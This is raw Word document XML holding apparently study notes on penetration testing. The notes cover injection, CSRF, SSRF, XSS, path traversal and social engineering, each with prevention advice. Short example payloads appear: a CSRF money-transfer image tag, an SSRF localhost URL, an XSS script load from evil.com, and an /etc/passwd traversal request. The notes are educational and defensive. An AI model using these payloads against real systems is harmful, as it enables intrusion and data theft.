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FBC7" w14:textId="587094C8" w:rsidR="008333F9" w:rsidRPr="00D704CA" w:rsidRDefault="00D704CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D704CA">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Penetration test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208937F" w14:textId="34BD46D3" w:rsidR="00D704CA" w:rsidRDefault="00D704CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D704CA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>What i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>t’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D704CA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> about</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C52DF4C" w14:textId="437738E3" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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What: authorized simulated cyberattack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCE46DD" w14:textId="6ED07C9F" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Goal: evaluate system security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F49D09A" w14:textId="2FB6EB9C" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Scope: what parts of the system / architecture are allowed to be tested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17798CB3" w14:textId="7CE40FB0" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Types of tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543ABB3D" w14:textId="1B347713" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Black-box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C8D3BE" w14:textId="023BECFE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No knowledge of architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFF6DD7" w14:textId="258E90E8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No access to source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6959DDA2" w14:textId="06083B9A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Exploits available from outside the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E32DBC" w14:textId="09E64CD2" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704CA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Internal vulnerabilities might not be discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631DC058" w14:textId="70B40C42" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Gray-box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46472461" w14:textId="3B615742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knowledge and access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205D4FD4" w14:textId="3D2BFC82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Could have elevated permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B82ECAE" w14:textId="452E21A3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Could have access to internal network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CD3F69" w14:textId="4E982027" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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White-box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D164C2A" w14:textId="0856B903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Access to architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02046203" w14:textId="35CAD5C2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Access to source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41774560" w14:textId="42EE17C2" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Time consuming, because a lot of data to process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43124957" w14:textId="4AA43C45" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704CA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Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A903F4" w14:textId="28A8CEA1" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0BB6A0" w14:textId="72CF6AC5" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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supplied data is not validated, filtered or sanitized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3FEE4C" w14:textId="2978897E" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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data is used in dynamic queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103F75C0" w14:textId="21DBE5DC" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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data is used directly in an interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DDEB9" w14:textId="7C4F49DC" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D178EF" w14:textId="35831770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SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0126FDC1" w14:textId="60082DE5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LDAP injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D5A30D" w14:textId="7A061DC4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CRLF injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B0E5EF" w14:textId="6A43A9B4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Command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8B0628" w14:textId="176E290B" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4462A559" w14:textId="67143959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Use of safe APIs (e.g., prepared statements for SQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645DC5D9" w14:textId="3AC64F5D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 validation (e.g., whitelist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DF6A44" w14:textId="4838E4C2" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Escape special characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ACCB08" w14:textId="3C9FF777" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704C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Cross Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE56D5D" w14:textId="7A3C85D7" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704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Trick victim into submitting malicious request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F4768B" w14:textId="77777777" w:rsidR="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704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Cookie-based session handling – Browser automatically include user’s credentials (e.g., session cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7969E8" w14:textId="6587FAFD" w:rsidR="00D704CA" w:rsidRPr="00D704CA" w:rsidRDefault="00D704CA" w:rsidP="00D704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Bank transfer can be used as follows: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC101C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>GET http://bank.com/transfer.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC101C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC101C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>o?acct=BOB&amp;amount=10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE77E37" w14:textId="1DF9E494" w:rsidR="00D704CA" w:rsidRPr="00AC101C" w:rsidRDefault="00D704CA" w:rsidP="00D704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Trick Alice into making a transfer (on another website): </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC101C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=” </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00AC101C" w:rsidRPr="00AC101C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://bank.com/transfer.do?acct=</w:t>
        </w:r>
        <w:r w:rsidR="00AC101C" w:rsidRPr="00AC101C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>EVE</w:t>
        </w:r>
        <w:r w:rsidR="00AC101C" w:rsidRPr="00AC101C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>&amp;amount=10</w:t>
        </w:r>
        <w:r w:rsidR="00AC101C" w:rsidRPr="00AC101C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>000000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AC101C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A0B0ED" w14:textId="5607C021" w:rsidR="00AC101C" w:rsidRPr="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00D704C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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02629127" w14:textId="7CCF1007" w:rsidR="00AC101C" w:rsidRPr="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CSRF Tokens on all state changing requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA6E716" w14:textId="54DC269C" w:rsidR="00AC101C" w:rsidRPr="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Unique per session (tied to user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC21A92" w14:textId="0524F423" w:rsidR="00AC101C" w:rsidRPr="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Unpredictable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B69E94" w14:textId="4EE24970" w:rsidR="00AC101C" w:rsidRPr="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Validated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A282A26" w14:textId="2B7CBF61" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101C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Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E24D72" w14:textId="19BD0936" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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Abuse the functionality of a server to make request to unintended locations, e.g., internal network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04172D18" w14:textId="7EC99283" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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Web application uses the user supplied URL to query, for example and internal REST server. The user can change this URL to include files or query other services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606A1C1" w14:textId="6E0FDFCB" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720967E7" w14:textId="27E9026B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Original: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;website&gt;/?url=example.com/api/request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310E9152" w14:textId="42595DC7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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;website&gt;/?url=http://localhost/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F8217" w14:textId="7ECA1849" w:rsidR="00AC101C" w:rsidRPr="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A12AFB1" w14:textId="432A4325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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Sanitize and validate client data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475EC1D3" w14:textId="2E30C5D4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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Enforce URL schema and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20221FF9" w14:textId="65517DC3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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Do not send the raw response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025286FF" w14:textId="6C558B2B" w:rsidR="00AC101C" w:rsidRPr="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101C">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Disable http redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C8DD6B" w14:textId="2AE86A5A" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101C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Cross-site scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144CF3F" w14:textId="141D907F" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101C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Type of injection attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D1D85" w14:textId="263D461A" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101C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Inject malicious scripts into trusted websites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B71469" w14:textId="0EF116D6" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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Steal private data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5205D68C" w14:textId="376C9855" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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Change the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1CB59E" w14:textId="759C2763" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101C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Stored:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029FF3E9" w14:textId="2C24DA0F" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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Injected script is permanently stored on target servers (e.g., in database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCE381C" w14:textId="34ABEADC" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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Post a message on a forum that includes JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425DBEC8" w14:textId="634C3B25" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101C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Reflected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759B5657" w14:textId="13003EB9" w:rsidR="00AC101C" w:rsidRDefault="00AC101C" w:rsidP="00AC101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Data is received in a HTTP request and that data is included in the response in an unsafe way (e.g., via URL query parameters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2227F336" w14:textId="524242A7" w:rsidR="00284891" w:rsidRPr="00284891" w:rsidRDefault="00284891" w:rsidP="00284891">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00284891">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>http://website/comment?message=&lt;script src=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00284891">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00284891">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00284891">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>//evil.com/hack.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>”&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF99F2" w14:textId="19DA8249" w:rsidR="00284891" w:rsidRPr="00284891" w:rsidRDefault="00284891" w:rsidP="0028489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cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4E9AE" w14:textId="07E228E2" w:rsidR="00284891" w:rsidRPr="00284891" w:rsidRDefault="00284891" w:rsidP="00284891">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Filter on arrival and encode on output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A472A5D" w14:textId="1E35A417" w:rsidR="00284891" w:rsidRPr="00284891" w:rsidRDefault="00284891" w:rsidP="00284891">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Use Content Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4D2F0" w14:textId="377CBC72" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="00284891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Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475628F8" w14:textId="67BEAA5E" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="0028489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Read arbitrary files on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189AC52C" w14:textId="5FC0EEEA" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="0028489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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A742F" w14:textId="67412641" w:rsidR="00284891" w:rsidRPr="00284891" w:rsidRDefault="00284891" w:rsidP="00284891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Images are loaded in the following way: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;img src=”/loadImage?filename=218.png”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49657EDA" w14:textId="0DB3DDF1" w:rsidR="00284891" w:rsidRPr="00284891" w:rsidRDefault="00284891" w:rsidP="00284891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cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Attack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;img src=”/loadImage?filename=…/…/…/etc/passwd”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48562DA8" w14:textId="32866FC1" w:rsidR="00284891" w:rsidRPr="00284891" w:rsidRDefault="00284891" w:rsidP="0028489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rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A79FB81" w14:textId="59505D51" w:rsidR="00284891" w:rsidRPr="00284891" w:rsidRDefault="00284891" w:rsidP="00284891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cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Do not pass user-supplied input to the file system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B18E1E9" w14:textId="1F2C9648" w:rsidR="00284891" w:rsidRPr="00284891" w:rsidRDefault="00284891" w:rsidP="00284891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cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Validate user input and only append to root directory (public directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8DF8DD" w14:textId="059B4AFF" w:rsidR="00284891" w:rsidRPr="00284891" w:rsidRDefault="00284891" w:rsidP="00284891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cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Verify after creating the new path that is still start with the expected root directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3198CA04" w14:textId="5A6282C0" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="00284891">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103EF4F1" w14:textId="3C8A0CC5" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="00284891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>Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1718C6F2" w14:textId="31F839E1" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="00284891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psychological manipulation of people into performing actions or divulging confidential information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD143A8" w14:textId="1398AB5B" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="00284891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a technical attack, but attacks the human itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F2753C" w14:textId="3B73D1BE" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="00284891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Techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65424435" w14:textId="2546BD91" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="0028489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Baiting: using a false promise to pique the victim’s greed or curiosity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E333C7" w14:textId="6C428117" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="00284891">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Leaving an USB with malware on the parking lot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F3E66" w14:textId="59198371" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="0028489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Scareware: scare the user into taking action they would not normally do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D474CC" w14:textId="4927C282" w:rsidR="00284891" w:rsidRDefault="00284891" w:rsidP="00284891">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Popup banner informing the victim that the computer is infected with malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155DD67D" w14:textId="7CD93F33" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA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Pretexting: establish trust with the victim by impersonating a right-to-know authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355A7B38" w14:textId="0CFA4D07" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Pretending to be someone from the victim’s bank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969C6BA" w14:textId="3141D20F" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA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Phishing: Email / text message campaign tricking victims into taking action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45245D85" w14:textId="72D18459" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Email informing you that some tried to login into your account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACF51A6" w14:textId="4BAAAC33" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA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Spear phishing: targeted version of phishing against a specific victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9D0BD2" w14:textId="2739CBC7" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA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Side Channel Attacks</w:t>
      </w:r>
    </w:p>
